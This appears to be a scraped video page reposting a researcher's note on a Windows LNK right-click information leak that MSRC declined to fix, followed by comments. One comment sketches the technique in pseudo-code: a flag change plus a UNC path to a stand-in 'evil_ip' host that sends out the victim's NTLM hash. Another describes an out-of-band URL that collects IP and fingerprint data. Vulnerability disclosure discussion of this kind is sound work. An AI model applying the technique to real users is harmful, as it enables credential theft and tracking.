Loading video...

Video Failed to Load

Go Home

A quick writeup on potential security issue of Windows LNK that I reported to MSRC last month. They decided to not fix due to relying on MOTW. In the blog I included the proof of concept. All you have to do is to Right-Click and get Info Disclosure :)

25,257 views • 1 year ago •via X (Twitter)

11 Comments

sixtyvividtails's profile picture
sixtyvividtails1 year ago

Nice seeing actual dig into details of .LNK structure! tag/TLDR: lnk.header.flags |= HAS_EXP_STRING; 🤭 lnk.envarBlock := "\\evil_ip\gibe_hash" then right-click to sendout the ntlm hash

nafiez's profile picture
nafiez1 year ago

Thanks 🫡

WAGMI | Crypto, DeFi & Web3 News's profile picture
WAGMI | Crypto, DeFi & Web3 News2 years ago

"My friends think I'm a crypto genius, (I'm not) it's because I read WAGMI’s weekly newsletter (and they have no idea it exists)" - Every Crypto Degen

I am Jakoby's profile picture
I am Jakoby1 year ago

I did something similar but I passed an http oob url and used it to collect their ip address, geolocation, and finger print info This is significantly more severe and I am honestly shocked they decided not to fix it

nafiez's profile picture
nafiez1 year ago

That sounds awesome! Have you write or publish anything about the stuff you work on? Yeah too bad they didn’t treat this as security issue since MOTW did the protection, according to them :-)

ClearSky Cyber Security's profile picture
ClearSky Cyber Security1 year ago

Open since June 24

nafiez's profile picture
nafiez1 year ago

The description looks similar however in your advisory seems to tie with CVE-2024-43451. How come this still not fix for the Right-Click? Any thoughts?

jcatblackhat's profile picture
jcatblackhat1 year ago

TAG: PoC

Jean's profile picture
Jean1 year ago

What's the app you use for function tracing?

nafiez's profile picture
nafiez1 year ago

I’m using Rohitab API Monitor

Bruno's profile picture
Bruno1 year ago

@BriPwn

Related Videos